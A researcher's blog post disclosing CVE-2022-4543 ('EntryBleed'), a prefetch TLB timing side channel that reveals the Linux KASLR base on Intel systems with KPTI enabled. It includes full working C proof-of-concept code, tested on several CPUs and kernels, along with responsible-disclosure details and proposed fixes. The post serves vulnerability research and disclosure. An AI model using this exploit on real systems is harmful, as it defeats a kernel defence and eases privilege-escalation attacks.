Search This Blog

Friday, December 16, 2022

EntryBleed: Breaking KASLR under KPTI with Prefetch (CVE-2022-4543)

Recently, I’ve discovered that Linux KPTI has implementation issues that can allow any unprivileged local attacker to bypass KASLR on Intel based systems. While technically only an info-leak, it still provides a primitive that has serious implications for bugs previously considered too hard to exploit and was assigned CVE-2022-4543. As you’ll see why from the writeup later on, I have decided to term this attack “EntryBleed.”

KPTI (or its original name KAISER) stands for Kernel Page Table Isolation. It was introduced as a patch for the Meltdown micro-architectural vulnerabilities a few years ago, where unprivileged attackers could utilize a side channel to bypass KASLR. According to documentation, KPTI basically splits apart the user and kernel page tables for each process. The kernel still has all of userspace virtual memory mapped in, but with the NX bit set; the user on the other hand will only have the minimal amount of kernel virtual memory mapped in, like exception/syscall entry handlers and anything else necessary for the user to kernel transition. KAISER actually stood for “Kernel Address Isolation to have Side-channels Efficiently Removed” and predates Meltdown, as other side-channel bypasses were already known to be an issue. If part of KPTI’s purpose is to act as a barrier against KASLR bypasses for CPU side-channel attacks, then clearly it has failed as of this post.

In 2016, Daniel Gruss discovered the concept of the prefetch sidechannel. I used one variant of it, which specifically utilized the TLB (the caching mechanism for virtual to physical address translations) as a side-channel mechanism. x86_64 has a group of prefetch instructions, which “prefetch” addresses into the CPU cache. A prefetch will finish quickly if the address being loaded is already present in the TLB, but will finish slower when the address is not present (and a page table walk needs to be done). At its time, it was known that ASLR (and KASLR) could be bypassed by timing prefetches across a potential range of addresses using high resolution timing instructions like “RDTSC.”

Before I continue with the attack, it must be noted that my main inspiration came from Google ProjectZero’s recent blogpost on exploiting CVE-2022-42703. In the final section of the blogpost, they discuss how KPTI has been left off as more modern CPUs have Meltdown mitigations in silicon, but this makes them vulnerable to prefetch again. In this case, one would just assume “Ok, let me enable KPTI again then.” To quote the post: “kPTI was helpful in mitigating this side channel,” which would make perfect sense based on the purpose of KPTI/KAISER and seemed to be the consensus when talking to a few other security researcher friends.

For whatever reason, I had a gut feeling that something was wrong. I thought that maybe the minimal subset of kernel code that is still mapped while userspace code is running could be located with prefetch techniques. After an hour of digging, I noticed the following. In syscall_init, the address of entry_SYSCALL_64 (which is at a constant offset from KASLR base based on /proc/kallsyms) is stored in the LSTAR MSR, which holds the address of the kernel’s handler for when a 64 bit syscall gets executed. Notice how the handler executes a few instructions first before switching to the kernel CR3 (if KPTI is on) - this means that this function has to still be mapped in userspace page tables. I then performed a manual page table walk in a debugger using the user CR3, and it turns out that entry_SYSCALL_64 is mapped at the same address in userland as it is in kernel using its KASLR rebased address - this sounds very suspicious!

At this point, I was quite confident that a prefetch side-channel could reveal the location of entry_SYSCALL_64, and since it seemed to be slid with the rest of the kernel, the KASLR base as well. The overall idea is just to repeatedly execute syscalls to ensure that the page with entry_SYSCALL_64 (hence the name EntryBleed) gets cached in the instruction TLB, and then prefetch side-channel the possible range of addresses for that handler (as the kernel itself is guaranteed to be within 0xffffffff80000000 - 0xffffffffc0000000). 

An astute reader might wonder how the entry is preserved upon returning to userland despite the CR3 write when switching to kernel page tables. This is most likely due to the global bit being set on this page's page table entry, which would protect it from TLB invalidation on mov instructions to CR3. In fact, PTI documentation says the following: "global pages are disabled for all kernel structures not mapped into both kernel and userspace page tables." I originally suspected that PCID (which introduces separate TLB contexts to lower the occurrence of invalidation using the lower 12 bits of CR3) was the root cause as it often appears in discussions about performance optimization of Meltdown mitigations, but the KPTI CR3 bitmask shows no modifications to PCID. Perhaps I'm misunderstanding the code, so it would be great if someone can correct me if I'm wrong here.

Anyways, the resulting bypass is extremely simple. Unlike some other uarch attacks, it seems to work fine under normal load in normal systems, and I can deduce KASLR base on systems with KPTI with almost complete accuracy by just averaging 100 iterations. Note that the measurement code itself is from the original prefetch paper, with cpuid swapped with a fence instruction for it to work in VMs (credit goes to p0 for that technique). Below is my code (entry_SYSCALL_64_offset has to be adjusted based on kernel by setting it to the distance between it and startup_64):

#include <stdio.h> #include <stdlib.h> #include <stdint.h> #define KERNEL_LOWER_BOUND 0xffffffff80000000ull #define KERNEL_UPPER_BOUND 0xffffffffc0000000ull #define entry_SYSCALL_64_offset 0x400000ull uint64_t sidechannel(uint64_t addr) { uint64_t a, b, c, d; asm volatile (".intel_syntax noprefix;" "mfence;" "rdtscp;" "mov %0, rax;" "mov %1, rdx;" "xor rax, rax;" "lfence;" "prefetchnta qword ptr [%4];" "prefetcht2 qword ptr [%4];" "xor rax, rax;" "lfence;" "rdtscp;" "mov %2, rax;" "mov %3, rdx;" "mfence;" ".att_syntax;" : "=r" (a), "=r" (b), "=r" (c), "=r" (d) : "r" (addr) : "rax", "rbx", "rcx", "rdx"); a = (b << 32) | a; c = (d << 32) | c; return c - a; } #define STEP 0x100000ull #define SCAN_START KERNEL_LOWER_BOUND + entry_SYSCALL_64_offset #define SCAN_END KERNEL_UPPER_BOUND + entry_SYSCALL_64_offset #define DUMMY_ITERATIONS 5 #define ITERATIONS 100 #define ARR_SIZE (SCAN_END - SCAN_START) / STEP uint64_t leak_syscall_entry(void) { uint64_t data[ARR_SIZE] = {0}; uint64_t min = ~0, addr = ~0; for (int i = 0; i < ITERATIONS + DUMMY_ITERATIONS; i++) { for (uint64_t idx = 0; idx < ARR_SIZE; idx++) { uint64_t test = SCAN_START + idx * STEP; syscall(104); uint64_t time = sidechannel(test); if (i >= DUMMY_ITERATIONS) data[idx] += time; } } for (int i = 0; i < ARR_SIZE; i++) { data[i] /= ITERATIONS; if (data[i] < min) { min = data[i]; addr = SCAN_START + i * STEP; } printf("%llx %ld\n", (SCAN_START + i * STEP), data[i]); } return addr; } int main() { printf ("KASLR base %llx\n", leak_syscall_entry() - entry_SYSCALL_64_offset); }

KASLR bypassed on systems with KPTI in less than 100 lines of C!

I’ve managed to have this work on multiple Intel CPUs (including i5-8265U, i7-8750H,  i7-9700F, i7-9750H, Xeon(R) CPU E5-2640) - I got it working on some VPS instances too but was unable to figure out the Intel CPU model there. It seems to work across a wide range of kernel versions with KPTI - I’ve tested it on Arch 6.0.12-hardened1-1-hardened, Ubuntu 5.15.0-56-generic, 6.0.12-1-MANJARO, 5.10.0-19-amd64, and a custom 5.18.3 build. It also works in KVM guests to leak the guest OS KASLR base (one would need to forward the host CPU features with "-cpu host" in QEMU for prefetch to even work though). I'm not sure how the TLB side-effects are preserved in a VM scenario though across CR3 writes and potential VM exits - if anyone has ideas, please let me know! As of now, I don’t think this attack affects AMD, but I also don't have direct access to any AMD hardware (see edit in the end). Lastly, I don't believe the repeated syscalls are necessary in my exploit as later tests show that it worked without making them with each measurement most likely due to the global bit, but I still kept it in my exploit just to guarantee its existence in the TLB.

Here is a demonstration of it (kernel base is printed before the shell for comparison purposes): 

One thing that could be done for increasing reliability would be accessing a lot of userspace addresses beforehand at specific strides to evict the TLB (and avoid false answers from other cached kernel addresses, which I saw with higher frequency on some systems). I also hypothesize that in scenarios without KPTI (like in ProjectZero’s case), prefetch would work even better if one were to trigger a specific codepath in kernel and specifically hunt for that offset during the side-channel.

In conclusion, Linux KPTI doesn’t do it’s job and it’s still quite easy to get KASLR base. I’ve already emailed security@kernel.org as well as relevant mailing lists for distros, and was authorized to disclose this as a potential fix might take a while. I’m honestly not too sure what the best approach to fix this as it’s more of an implementation issue, but I suggested that to randomize the virtual address of entry/exit handlers that are mapped into userspace, have them be at a fixed virtual address unrelated to kernel base, or have a randomized offset from kernel base. I suspect that this problem might really just be due to a major oversight; one kernel developer mentioned to me that this was definitely not the intent and might have been a regression.

I’ll end this post with some acknowledgements. A huge shoutout must go to my uarch security mentor Joseph Ravichandran from MIT CSAIL for guiding me throughout this field of research and advising me a lot on this bug. He introduced me to prefetch attacks through the Secure Hardware Design course from Professor Mengjia Yan - one of their final labs is actually about bypassing userland ASLR using prefetch. Thanks must go to Seth Jenkins at ProjectZero for the original inspiration too, and D3v17 for his support and extensive testing. As always, feel free to ask questions or point out any mistakes in my explanations!

Edit (12/18/2022): As bcoles later informed me, a generic prefetch attack seems to work for some AMD CPUs, which isn't surprising given this paper and this security advisory. However, it's also important to note that this would basically be the same attack as ProjectZero discussed originally, as AMD was not affected by Meltdown so KPTI was never enabled for their processors.